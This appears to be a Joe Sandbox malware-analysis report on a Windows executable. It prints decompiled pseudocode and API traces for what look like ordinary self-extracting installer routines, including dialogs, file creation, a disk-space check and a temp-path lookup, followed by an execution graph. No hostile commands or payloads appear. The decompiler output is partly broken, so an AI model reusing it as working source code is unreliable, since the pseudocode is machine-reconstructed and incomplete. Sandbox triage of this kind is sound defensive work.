                                                                                                                                                                                                    • Instruction ID: 2613b5bde3e8f326bd80ddc982f5d82e84b38e76efd8cec5c4475a183e2bc103
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5850a8155ff4b6c5bfc617ac4e4f4a2220814d80ceb9f6ef5819d86b9ea32943
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D911E5756086426FEF279F24AC18F773B5EEBC6300F05855AFA829B351DA378C078660
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00393680(void* __ecx) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				struct tagMSG _v36;
                                                                                                                                                                                                    				int _t8;
                                                                                                                                                                                                    				struct HWND__* _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v8 = __ecx;
                                                                                                                                                                                                    				_t16 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							if(_v36.message != 0x12) {
                                                                                                                                                                                                    								DispatchMessageA( &_v36);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t16 = 1;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                    						} while (_t8 != 0);
                                                                                                                                                                                                    						if(_t16 == 0) {
                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					break;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t8;
                                                                                                                                                                                                    			}







                                                                                                                                                                                                    0x0039368c
                                                                                                                                                                                                    0x0039368f
                                                                                                                                                                                                    0x00393691
                                                                                                                                                                                                    0x0039369f
                                                                                                                                                                                                    0x003936a7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003936ba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003936bc
                                                                                                                                                                                                    0x003936bc
                                                                                                                                                                                                    0x003936c0
                                                                                                                                                                                                    0x003936cb
                                                                                                                                                                                                    0x003936c2
                                                                                                                                                                                                    0x003936c4
                                                                                                                                                                                                    0x003936c4
                                                                                                                                                                                                    0x003936da
                                                                                                                                                                                                    0x003936e0
                                                                                                                                                                                                    0x003936e6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003936e6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003936ba
                                                                                                                                                                                                    0x003936ed

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0039369F
                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003936B2
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 003936CB
                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003936DA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2776232527-0
                                                                                                                                                                                                    • Opcode ID: 3c0557d32a6eb058825b8eda7c14670189f767ace5c369c417c2304833f4f80f
                                                                                                                                                                                                    • Instruction ID: b0e825f1ab04507fb8c8e6082331b691dce0523480d2c1cd635cb2d791d21b64
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c0557d32a6eb058825b8eda7c14670189f767ace5c369c417c2304833f4f80f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 440167B290025577DF314BA65C88EEB767CEBC5B10F15021AF915E2184D561CA44C6A1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                    			E003965E8(char* __ecx) {
                                                                                                                                                                                                    				char _t3;
                                                                                                                                                                                                    				char _t10;
                                                                                                                                                                                                    				char* _t12;
                                                                                                                                                                                                    				char* _t14;
                                                                                                                                                                                                    				char* _t15;
                                                                                                                                                                                                    				CHAR* _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t12 = __ecx;
                                                                                                                                                                                                    				_t15 = __ecx;
                                                                                                                                                                                                    				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                    				_t10 = 0;
                                                                                                                                                                                                    				do {
                                                                                                                                                                                                    					_t3 =  *_t12;
                                                                                                                                                                                                    					_t12 =  &(_t12[1]);
                                                                                                                                                                                                    				} while (_t3 != 0);
                                                                                                                                                                                                    				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                    					if(_t16 <= _t15) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if( *_t16 == 0x5c) {
                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                    						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                    							_t16 = CharNextA(_t16);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *_t16 = _t10;
                                                                                                                                                                                                    						_t10 = 1;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_push(_t16);
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					return _t10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if( *_t16 == 0x5c) {
                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                    			}









                                                                                                                                                                                                    0x003965e8
                                                                                                                                                                                                    0x003965ed
                                                                                                                                                                                                    0x003965ef
                                                                                                                                                                                                    0x003965f2
                                                                                                                                                                                                    0x003965f4
                                                                                                                                                                                                    0x003965f4
                                                                                                                                                                                                    0x003965f6
                                                                                                                                                                                                    0x003965f7
                                                                                                                                                                                                    0x00396608
                                                                                                                                                                                                    0x00396611
                                                                                                                                                                                                    0x00396618
                                                                                                                                                                                                    0x0039661c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039660e
                                                                                                                                                                                                    0x00396623
                                                                                                                                                                                                    0x00396625
                                                                                                                                                                                                    0x0039663b
                                                                                                                                                                                                    0x0039663b
                                                                                                                                                                                                    0x0039663d
                                                                                                                                                                                                    0x00396641
                                                                                                                                                                                                    0x00396610
                                                                                                                                                                                                    0x00396610
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396610
                                                                                                                                                                                                    0x00396644
                                                                                                                                                                                                    0x00396647
                                                                                                                                                                                                    0x00396647
                                                                                                                                                                                                    0x00396621
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00392B33), ref: 00396602
                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 00396612
                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 00396629
                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 00396635
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$Prev$Next
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3260447230-0
                                                                                                                                                                                                    • Opcode ID: dd83211fd273cb4489d0391e9a2e2e449d082913705d51ae52fd891d2fa870a5
                                                                                                                                                                                                    • Instruction ID: 92161ee78f418aa5b641127d46a3727e00c20deb8550037fd5f6db4204e07f50
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd83211fd273cb4489d0391e9a2e2e449d082913705d51ae52fd891d2fa870a5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87F0C8324069506EEF331B299C88DBBBF9CDFC7365F2B02AFE4D692001D6560D4686A1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E003969B0() {
                                                                                                                                                                                                    				intOrPtr* _t4;
                                                                                                                                                                                                    				intOrPtr* _t5;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				intOrPtr _t11;
                                                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				 *0x3981f8 = E00396C70();
                                                                                                                                                                                                    				__set_app_type(E00396FBE(2));
                                                                                                                                                                                                    				 *0x3988a4 =  *0x3988a4 | 0xffffffff;
                                                                                                                                                                                                    				 *0x3988a8 =  *0x3988a8 | 0xffffffff;
                                                                                                                                                                                                    				_t4 = __p__fmode();
                                                                                                                                                                                                    				_t11 =  *0x398528; // 0x0
                                                                                                                                                                                                    				 *_t4 = _t11;
                                                                                                                                                                                                    				_t5 = __p__commode();
                                                                                                                                                                                                    				_t12 =  *0x39851c; // 0x0
                                                                                                                                                                                                    				 *_t5 = _t12;
                                                                                                                                                                                                    				_t6 = E00397000();
                                                                                                                                                                                                    				if( *0x398000 == 0) {
                                                                                                                                                                                                    					__setusermatherr(E00397000);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E003971EF(_t6);
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x003969b7
                                                                                                                                                                                                    0x003969c2
                                                                                                                                                                                                    0x003969c8
                                                                                                                                                                                                    0x003969cf
                                                                                                                                                                                                    0x003969d8
                                                                                                                                                                                                    0x003969de
                                                                                                                                                                                                    0x003969e4
                                                                                                                                                                                                    0x003969e6
                                                                                                                                                                                                    0x003969ec
                                                                                                                                                                                                    0x003969f2
                                                                                                                                                                                                    0x003969f4
                                                                                                                                                                                                    0x00396a00
                                                                                                                                                                                                    0x00396a07
                                                                                                                                                                                                    0x00396a0d
                                                                                                                                                                                                    0x00396a0e
                                                                                                                                                                                                    0x00396a15

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00396FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00396FC5
                                                                                                                                                                                                    • __set_app_type.MSVCRT ref: 003969C2
                                                                                                                                                                                                    • __p__fmode.MSVCRT ref: 003969D8
                                                                                                                                                                                                    • __p__commode.MSVCRT ref: 003969E6
                                                                                                                                                                                                    • __setusermatherr.MSVCRT ref: 00396A07
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1632413811-0
                                                                                                                                                                                                    • Opcode ID: 4de4baf6fbc5953186dd0367fe7154995e2e6534b8a020f291ea0328f3e617eb
                                                                                                                                                                                                    • Instruction ID: f887825e8e0158f9eccf270c2cd26193ad7c8c0736c35b60dd67db5049122a92
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4de4baf6fbc5953186dd0367fe7154995e2e6534b8a020f291ea0328f3e617eb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0F0F8B01197018FDB57AB34ED0A6043BA9FB86321F110A0BE4A28A2E1CF3B8555CA11
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00396952(CHAR* __ecx) {
                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                    				long _v16;
                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                    				int _t22;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t22 = 0;
                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                    				if( *__ecx != 0) {
                                                                                                                                                                                                    					_t6 =  &_v20; // 0x395760
                                                                                                                                                                                                    					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
                                                                                                                                                                                                    						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t22;
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x0039695b
                                                                                                                                                                                                    0x00396960
                                                                                                                                                                                                    0x00396963
                                                                                                                                                                                                    0x00396966
                                                                                                                                                                                                    0x00396969
                                                                                                                                                                                                    0x0039696c
                                                                                                                                                                                                    0x00396972
                                                                                                                                                                                                    0x00396987
                                                                                                                                                                                                    0x0039699f
                                                                                                                                                                                                    0x0039699f
                                                                                                                                                                                                    0x00396987
                                                                                                                                                                                                    0x003969a7

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W9,?,00000000,00395760,?,A:\), ref: 0039697F
                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000400), ref: 00396999
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DiskFreeSpace
                                                                                                                                                                                                    • String ID: `W9
                                                                                                                                                                                                    • API String ID: 1705453755-493441449
                                                                                                                                                                                                    • Opcode ID: c90e9a44d79b056a79d643c5beae573a1a5704adcefca0047df3254a0f8647de
                                                                                                                                                                                                    • Instruction ID: 26ea0990d1064fcdd96617f08ab266f4d91e98b973d3df4ccf1b7678631c997b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c90e9a44d79b056a79d643c5beae573a1a5704adcefca0047df3254a0f8647de
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9F097B6D11228BBDB12DFE88D45ADEBBBCEB48700F154297A510E6240D6719A058BD1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                    Execution Coverage:28.7%
                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                    Total number of Nodes:960
                                                                                                                                                                                                    Total number of Limit Nodes:24
                                                                                                                                                                                                    execution_graph 2196 134ad0 2204 133680 2196->2204 2199 134ae9 2200 134aee WriteFile 2201 134b14 2200->2201 2202 134b0f 2200->2202 2201->2202 2203 134b3b SendDlgItemMessageA 2201->2203 2203->2202 2205 133691 MsgWaitForMultipleObjects 2204->2205 2206 1336a9 PeekMessageA 2205->2206 2207 1336e8 2205->2207 2206->2205 2208 1336bc 2206->2208 2207->2199 2207->2200 2208->2205 2208->2207 2209 1336c7 DispatchMessageA 2208->2209 2210 1336d1 PeekMessageA 2208->2210 2209->2210 2210->2208 2211 134cd0 2212 134cf4 2211->2212 2214 134d0b 2211->2214 2213 134d02 2212->2213 2215 134b60 FindCloseChangeNotification 2212->2215 2268 136ce0 2213->2268 2214->2213 2217 134dcb 2214->2217 2220 134d25 2214->2220 2215->2213 2218 134dd4 SetDlgItemTextA 2217->2218 2221 134de3 2217->2221 2218->2221 2219 134e95 2220->2213 2234 134c37 2220->2234 2221->2213 2242 13476d 2221->2242 2224 134e38 2224->2213 2251 134980 2224->2251 2230 134e64 2259 1347e0 LocalAlloc 2230->2259 2233 134e6f 2233->2213 2235 134c88 2234->2235 2236 134c4c DosDateTimeToFileTime 2234->2236 2235->2213 2239 134b60 2235->2239 2236->2235 2237 134c5e LocalFileTimeToFileTime 2236->2237 2237->2235 2238 134c70 SetFileTime 2237->2238 2238->2235 2240 134b92 FindCloseChangeNotification 2239->2240 2241 134b76 SetFileAttributesA 2239->2241 2240->2241 2241->2213 2273 1366ae GetFileAttributesA 2242->2273 2244 13477b 2244->2224 2245 1347cc SetFileAttributesA 2246 1347db 2245->2246 2246->2224 2250 1347c2 2250->2245 2252 134990 2251->2252 2253 1349c2 lstrcmpA 2252->2253 2254 1349a5 2252->2254 2256 1349ba 2253->2256 2257 134a0e 2253->2257 2255 1344b9 20 API calls 2254->2255 2255->2256 2256->2213 2256->2230 2257->2256 2339 13487a 2257->2339 2260 1347f6 2259->2260 2261 13480f LocalAlloc 2259->2261 2262 1344b9 20 API calls 2260->2262 2263 13480b 2261->2263 2265 134831 2261->2265 2262->2263 2263->2233 2266 1344b9 20 API calls 2265->2266 2267 134846 LocalFree 2266->2267 2267->2263 2269 136ceb 2268->2269 2270 136ce8 2268->2270 2352 136cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2269->2352 2270->2219 2272 136e26 2272->2219 2274 134777 2273->2274 2274->2244 2274->2245 2275 136517 FindResourceA 2274->2275 2276 136536 LoadResource 2275->2276 2277 13656b 2275->2277 2276->2277 2278 136544 DialogBoxIndirectParamA FreeResource 2276->2278 2282 1344b9 2277->2282 2278->2277 2281 1347b1 2278->2281 2281->2245 2281->2246 2281->2250 2283 13455a 2282->2283 2284 1344fe LoadStringA 2282->2284 2288 136ce0 4 API calls 2283->2288 2285 134562 2284->2285 2286 134527 2284->2286 2291 1345c9 2285->2291 2298 13457e 2285->2298 2287 13681f 10 API calls 2286->2287 2290 13452c 2287->2290 2289 134689 2288->2289 2289->2281 2292 134536 MessageBoxA 2290->2292 2323 1367c9 2290->2323 2294 134607 LocalAlloc 2291->2294 2295 1345cd LocalAlloc 2291->2295 2292->2283 2294->2283 2297 1345c4 2294->2297 2295->2283 2302 1345f3 2295->2302 2300 13462d MessageBeep 2297->2300 2298->2298 2301 134596 LocalAlloc 2298->2301 2311 13681f 2300->2311 2301->2283 2305 1345af 2301->2305 2303 13171e _vsnprintf 2302->2303 2303->2297 2329 13171e 2305->2329 2308 134645 MessageBoxA LocalFree 2308->2283 2309 1367c9 EnumResourceLanguagesA 2309->2308 2312 136940 2311->2312 2313 136857 GetVersionExA 2311->2313 2314 136ce0 4 API calls 2312->2314 2315 13691a 2313->2315 2316 13687c 2313->2316 2317 13463b 2314->2317 2315->2312 2316->2315 2318 1368a5 GetSystemMetrics 2316->2318 2317->2308 2317->2309 2318->2315 2319 1368b5 RegOpenKeyExA 2318->2319 2319->2315 2320 1368d6 RegQueryValueExA RegCloseKey 2319->2320 2320->2315 2321 13690c 2320->2321 2333 1366f9 2321->2333 2324 1367e2 2323->2324 2325 136803 2323->2325 2337 136793 EnumResourceLanguagesA 2324->2337 2325->2292 2327 1367f5 2327->2325 2338 136793 EnumResourceLanguagesA 2327->2338 2330 13172d 2329->2330 2331 13173d _vsnprintf 2330->2331 2332 13175d 2330->2332 2331->2332 2332->2297 2334 13670f 2333->2334 2335 136740 CharNextA 2334->2335 2336 13674b 2334->2336 2335->2334 2336->2315 2337->2327 2338->2325 2340 1348a2 CreateFileA 2339->2340 2342 1348e9 2340->2342 2343 134908 2340->2343 2342->2343 2344 1348ee 2342->2344 2343->2256 2347 13490c 2344->2347 2348 134917 2347->2348 2349 1348f5 CreateFileA 2347->2349 2348->2349 2350 134962 CharNextA 2348->2350 2351 134953 CreateDirectoryA 2348->2351 2349->2343 2350->2348 2351->2350 2352->2272 3119 133210 3120 133227 3119->3120 3121 13328e EndDialog 3119->3121 3122 1333e2 GetDesktopWindow 3120->3122 3123 133235 3120->3123 3137 133239 3121->3137 3172 1343d0 6 API calls 3122->3172 3127 1332dd GetDlgItemTextA 3123->3127 3128 13324c 3123->3128 3123->3137 3130 133366 3127->3130 3138 1332fc 3127->3138 3131 133251 3128->3131 3132 1332c5 EndDialog 3128->3132 3129 13341f GetDlgItem EnableWindow 3129->3137 3136 1344b9 20 API calls 3130->3136 3133 13325c LoadStringA 3131->3133 3131->3137 3132->3137 3134 133294 3133->3134 3135 13327b 3133->3135 3157 134224 LoadLibraryA 3134->3157 3141 1344b9 20 API calls 3135->3141 3136->3137 3138->3130 3140 133331 GetFileAttributesA 3138->3140 3143 13333f 3140->3143 3144 13337c 3140->3144 3141->3121 3147 1344b9 20 API calls 3143->3147 3146 13658a CharPrevA 3144->3146 3145 1332a5 SetDlgItemTextA 3145->3135 3145->3137 3148 13338d 3146->3148 3149 133351 3147->3149 3150 1358c8 27 API calls 3148->3150 3149->3137 3151 13335a CreateDirectoryA 3149->3151 3152 133394 3150->3152 3151->3130 3151->3144 3152->3130 3153 1333a4 3152->3153 3154 1333c7 EndDialog 3153->3154 3155 13597d 34 API calls 3153->3155 3154->3137 3156 1333c3 3155->3156 3156->3137 3156->3154 3158 1343b2 3157->3158 3159 134246 GetProcAddress 3157->3159 3163 1344b9 20 API calls 3158->3163 3160 1343a4 FreeLibrary 3159->3160 3161 13425d GetProcAddress 3159->3161 3160->3158 3161->3160 3162 134274 GetProcAddress 3161->3162 3162->3160 3164 13428b 3162->3164 3165 13329d 3163->3165 3166 134295 GetTempPathA 3164->3166 3171 1342e1 3164->3171 3165->3137 3165->3145 3167 1342ad 3166->3167 3167->3167 3168 1342b4 CharPrevA 3167->3168 3169 1342d0 CharPrevA 3168->3169 3168->3171 3169->3171 3170 134390 FreeLibrary 3170->3165 3171->3170 3174 134463 SetWindowPos 3172->3174 3175 136ce0 4 API calls 3174->3175 3176 1333f1 SetWindowTextA SendDlgItemMessageA 3175->3176 3176->3129 3176->3137 3177 134a50 3178 134a9f ReadFile 3177->3178 3180 134a66 3177->3180 3179 134abb 3178->3179 3180->3179 3181 134a82 memcpy 3180->3181 3181->3179 3182 133450 3183 1334d3 EndDialog 3182->3183 3184 13345e 3182->3184 3187 13346a 3183->3187 3185 13349a GetDesktopWindow 3184->3185 3188 133465 3184->3188 3186 1343d0 11 API calls 3185->3186 3189 1334ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3186->3189 3188->3187 3190 13348c EndDialog 3188->3190 3189->3187 3190->3187 3191 136c03 3192 136c17 _exit 3191->3192 3193 136c1e 3191->3193 3192->3193 3194 136c27 _cexit 3193->3194 3195 136c32 3193->3195 3194->3195 2353 136f40 SetUnhandledExceptionFilter 2354 134cc0 GlobalFree 3196 134200 3197 13420b SendMessageA 3196->3197 3198 13421e 3196->3198 3197->3198 3199 133100 3200 1331b0 3199->3200 3202 133111 3199->3202 3201 1331b9 SendDlgItemMessageA 3200->3201 3204 133141 3200->3204 3201->3204 3205 133149 GetDesktopWindow 3202->3205 3206 13311d 3202->3206 3203 133138 EndDialog 3203->3204 3207 1343d0 11 API calls 3205->3207 3206->3203 3206->3204 3208 13315d 6 API calls 3207->3208 3208->3204 3209 134bc0 3211 134bd7 3209->3211 3212 134c05 3209->3212 3210 134c1b SetFilePointer 3210->3211 3212->3210 3212->3211 3213 1330c0 3214 1330de CallWindowProcA 3213->3214 3215 1330ce 3213->3215 3216 1330da 3214->3216 3215->3214 3215->3216 3217 1363c0 3218 136407 3217->3218 3219 13658a CharPrevA 3218->3219 3220 136415 CreateFileA 3219->3220 3221 13643a 3220->3221 3222 136448 WriteFile 3220->3222 3225 136ce0 4 API calls 3221->3225 3223 136465 CloseHandle 3222->3223 3223->3221 3226 13648f 3225->3226 3227 137270 _except_handler4_common 3228 1369b0 3229 1369b5 3228->3229 3237 136fbe GetModuleHandleW 3229->3237 3231 1369c1 __set_app_type __p__fmode __p__commode 3232 1369f9 3231->3232 3233 136a02 __setusermatherr 3232->3233 3234 136a0e 3232->3234 3233->3234 3239 1371ef _controlfp 3234->3239 3236 136a13 3238 136fcf 3237->3238 3238->3231 3239->3236 3240 1334f0 3241 133504 3240->3241 3242 1335b8 3240->3242 3241->3242 3243 13351b 3241->3243 3244 1335be GetDesktopWindow 3241->3244 3245 133526 3242->3245 3246 133671 EndDialog 3242->3246 3248 13354f 3243->3248 3249 13351f 3243->3249 3247 1343d0 11 API calls 3244->3247 3246->3245 3250 1335d6 3247->3250 3248->3245 3252 133559 ResetEvent 3248->3252 3249->3245 3251 13352d TerminateThread EndDialog 3249->3251 3253 1335e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3250->3253 3254 13361d SetWindowTextA CreateThread 3250->3254 3251->3245 3255 1344b9 20 API calls 3252->3255 3253->3254 3254->3245 3256 133646 3254->3256 3257 133581 3255->3257 3259 1344b9 20 API calls 3256->3259 3258 13359b SetEvent 3257->3258 3260 13358a SetEvent 3257->3260 3261 133680 4 API calls 3258->3261 3259->3242 3260->3245 3261->3242 3262 136ef0 3263 136f2d 3262->3263 3264 136f02 3262->3264 3264->3263 3265 136f27 ?terminate@ 3264->3265 3265->3263 2355 134ca0 GlobalAlloc 2356 136a60 2373 137155 2356->2373 2358 136a65 2359 136a76 GetStartupInfoW 2358->2359 2360 136a93 2359->2360 2361 136aa8 2360->2361 2362 136aaf Sleep 2360->2362 2363 136ac7 _amsg_exit 2361->2363 2365 136ad1 2361->2365 2362->2360 2363->2365 2364 136b13 _initterm 2368 136b2e __IsNonwritableInCurrentImage 2364->2368 2365->2364 2366 136af4 2365->2366 2365->2368 2367 136bd6 _ismbblead 2367->2368 2368->2367 2369 136c1e 2368->2369 2372 136bbe exit 2368->2372 2378 132bfb GetVersion 2368->2378 2369->2366 2370 136c27 _cexit 2369->2370 2370->2366 2372->2368 2374 13717a 2373->2374 2375 13717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2373->2375 2374->2375 2376 1371e2 2374->2376 2377 1371cd 2375->2377 2376->2358 2377->2376 2379 132c50 2378->2379 2380 132c0f 2378->2380 2395 132caa memset memset memset 2379->2395 2380->2379 2382 132c13 GetModuleHandleW 2380->2382 2382->2379 2383 132c22 GetProcAddress 2382->2383 2383->2379 2389 132c34 2383->2389 2385 132c8e 2386 132c97 CloseHandle 2385->2386 2387 132c9e 2385->2387 2386->2387 2387->2368 2389->2379 2393 132c89 2489 131f90 